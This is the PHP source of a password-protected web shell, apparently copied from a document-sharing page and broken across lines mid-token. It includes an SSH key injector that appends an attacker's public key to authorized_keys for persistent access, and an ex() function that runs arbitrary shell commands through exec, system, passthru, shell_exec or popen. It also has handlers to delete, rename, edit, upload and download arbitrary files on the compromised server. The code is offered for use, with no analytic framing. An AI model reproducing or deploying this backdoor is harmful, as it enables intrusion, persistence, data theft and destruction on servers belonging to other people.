Beruflich Dokumente
Kultur Dokumente
php
session_start();
// error_reporting(0);
if (isset($_POST['password'])) {
if (md5($_POST['password']) == 'bf211b896d1233e0b9fc5acb604b0329') {
$_SESSION['password'] = $_POST['password'];
header("Location: ?");
} else {
header("Location: ?");
}
}
// ssh key injector
if (isset($_POST['inject_key'])) {
$key = $_POST['pub_key'];
// TODO: make this method works on windows servers
// this is only for linux server
chdir($_SERVER['DOCUMENT_ROOT'] . "/..");
if (file_exists(getcwd() . "/.ssh")) {
if (!is_writable((getcwd() . '/.ssh'))) {
header("Location: ?view=injector&action=ssh&msg=" . base
64_encode("permission denied"));
die();
}
} else {
if (!is_writable(getcwd())) {
header("Location: ?view=injector&action=ssh&msg=" . base
64_encode("permission denied"));
die();
}
mkdir(getcwd() . "/.ssh");
}
$key_file = fopen(getcwd() . "/.ssh/authorized_keys", "a+");
fwrite($key_file, $key);
fclose($key_file);
chdir($_SESSION['cd']);
header("Location: ?view=injector&action=ssh&msg=" . base64_encode("ssh k
ey injected successfully!"));
}
function download($filename){
if(!empty($filename)){
// Specify file path.
$path = ''; // '/uplods/'
$download_file = $path.$filename;
// Check file is exists on given path.
if(file_exists($download_file)) {
// Getting file extension.
$extension = explode('.',$filename);
$extension = $extension[count($extension)-1];
// For Gecko browsers
header('Content-Transfer-Encoding: binary');
header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . '
GMT');
// Supports for download resume
header('Accept-Ranges: bytes');
// Calculate File size
header('Content-Length: ' . filesize($download_file));
header('Content-Encoding: none');
// Change the mime type if the file is not PDF
header('Content-Type: application/'.$extension);
// Make the browser display the Save As dialog
header('Content-Disposition: attachment; filename=' . $filename);
readfile($download_file);
exit;
}
else {
header("Location: ?msg=" . base64_encode('File does not exists on given pa
th'));
}
}
}
if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'down
load') {
download($_GET['view']);
}
if (isset($_GET['action']) AND $_GET['action'] == 'logout') {
session_destroy();
header("Location: ?");
die();
}
function delete_directory($dirname) {
if (is_dir($dirname))
$dir_handle = opendir($dirname);
if (!$dir_handle)
return false;
while($file = readdir($dir_handle)) {
if ($file != "." && $file != "..") {
if (!is_dir($dirname."/".$file))
unlink($dirname."/".$file);
else
delete_directory($dirname.'/'.$file);
}
}
closedir($dir_handle);
rmdir($dirname);
return true;
}
if (isset($_GET['cd'])) {
$_SESSION['cd'] = base64_decode($_GET['cd']);
}
if (isset($_GET['rmdir'])) {
$file = realpath(base64_decode($_GET['rmdir']));
if (file_exists($file)) {
if (is_writable($file)) {
delete_directory($file);
header("Location: ?msg=" . base64_encode($file . " has b
een deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permission den
ied!"));
}
}
}
if (isset($_GET['rmfile'])) {
$file = realpath(base64_decode($_GET['rmfile']));
if (file_exists($file)) {
if (is_writable($file)) {
unlink($file);
header("Location: ?msg=" . base64_encode($file . " has b
een deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permission den
ied!"));
}
}
}
if (isset($_GET['multirmfile'])) {
for ($i = 0; $i < intval($_GET['multirmfile']); $i++) {
$file = realpath(base64_decode($_GET['rmfile' . $i]));
if (file_exists($file)) {
if (is_writable($file)) {
if (is_dir($file)) {
rmdir($file);
} else {
unlink($file);
}
header("Location: ?msg=" . base64_encode("select
ed file(s) has been deleted!"));
} else {
header("Location: ?msg=" . base64_encode("permis
sion denied!"));
}
}
}
}
if (isset($_SESSION['cd'])) {
chdir($_SESSION['cd']);
}
if (isset($_GET['to']) AND isset($_GET['from'])) {
$from = base64_decode($_GET['from']);
$to = $_GET['to'];
if (is_writable($from)) {
if (file_exists($from)) {
rename($from, getcwd() . '/' . $to);
header('Location: ?msg=' . base64_encode("file renamed s
uccessfully!"));
} else {
header("Location: ?msg=" . base64_encode("file doesn't e
xist"));
}
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
function formatSizeUnits($bytes) {
if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824,
2) . ' GB'; }
elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2)
. ' MB'; }
elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' K
B'; }
elseif ($bytes > 1) { $bytes = $bytes . ' B'; }
elseif ($bytes == 1) { $bytes = $bytes . ' B'; }
else { $bytes = '0 B'; }
return $bytes;
}
function formatPerms($perms) {
switch ($perms & 0xF000) {
case 0xC000: // socket
$info = 's';
break;
case 0xA000: // symbolic link
$info = 'l';
break;
case 0x8000: // regular
$info = 'r';
break;
case 0x6000: // block special
$info = 'b';
break;
case 0x4000: // directory
$info = 'd';
break;
case 0x2000: // character special
$info = 'c';
break;
case 0x1000: // FIFO pipe
$info = 'p';
break;
default: // unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function modifiedDate($filename) {
if (file_exists($filename)) {
return date ("M-d-Y H:i:s", filemtime($filename));
}
}
function ex($in) {
$out = '';
if(function_exists('exec')) {
@exec($in,$out);
$out = @join("\n",$out);
}elseif(function_exists('passthru')) {
ob_start();
@passthru($in);
$out = ob_get_clean();
}elseif(function_exists('system')) {
ob_start();
@system($in);
$out = ob_get_clean();
}elseif(function_exists('shell_exec')) {
$out = shell_exec($in);
}elseif(is_resource($f = @popen($in,"r"))) {
$out = "";
while(!@feof($f))
$out .= fread($f,1024);
pclose($f);
}
return $out;
}
function which($p) {
$path = ex('which '.$p);
if(!empty($path))
return $path;
return false;
}
if (isset($_POST['edit'])) {
if (is_writable($_POST['dest'])) {
$file = fopen($_POST['dest'], 'w');
fwrite($file, $_POST['content']);
fclose($file);
header('Location: ?msg=' . base64_encode("file saved!"));
} else {
header('Location: ?msg=' . base64_encode("permission denied!"));
}
}
if (isset($_GET['touch']) AND isset($_GET['file'])) {
if (is_writable(dirname(base64_decode($_GET['touch'])))) {
$content = "";
$fp = fopen(base64_decode($_GET['touch']) . '/' . $_GET['file'],
"wb");
fwrite($fp,$content);
fclose($fp);
header("Location: ?msg=" . base64_encode($_GET['file'] . " has b
een created!"));
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
if (isset($_GET['mkdir_path']) AND isset($_GET['folder'])) {
if (is_writable(dirname(base64_decode($_GET['mkdir_path'])))) {
mkdir(base64_decode($_GET['mkdir_path']) . '/' . $_GET['folder']
);
header("Location: ?msg=" . base64_encode($_GET['folder'] . " fol
der has been created!"));
} else {
header("Location: ?msg=" . base64_encode("permission denied!"));
}
}
if (isset($_POST['upload'])) {
if (is_writable($_POST['path'])) {
$files = @$_FILES["files"];
$fullpath = $_POST['path'] . "/" . $files["name"];
// if (file_exists($fullpath)) {
// header("Location: ?msg=" . base64_encode("file already e
xist!"));
// die();
// }
if ($files["name"] != '') {
if (move_uploaded_file($files['tmp_name'], $fullpath)) {
header("Location: ?msg=" . base64_encode("file u
ploaded to $fullpath"));
} else {
header("Location: ?msg=" . base64_encode("an err
or occured!"));
}
}
} else {
header("Location: ?msg=" . base64_encode(base64_decode('permissi
on denied!')));
}
}
if ($_SERVER['REQUEST_METHOD'] == 'POST' AND isset($_POST['qpath'])) {
header("Location: ?cd=" . base64_encode($_POST['qpath']));
}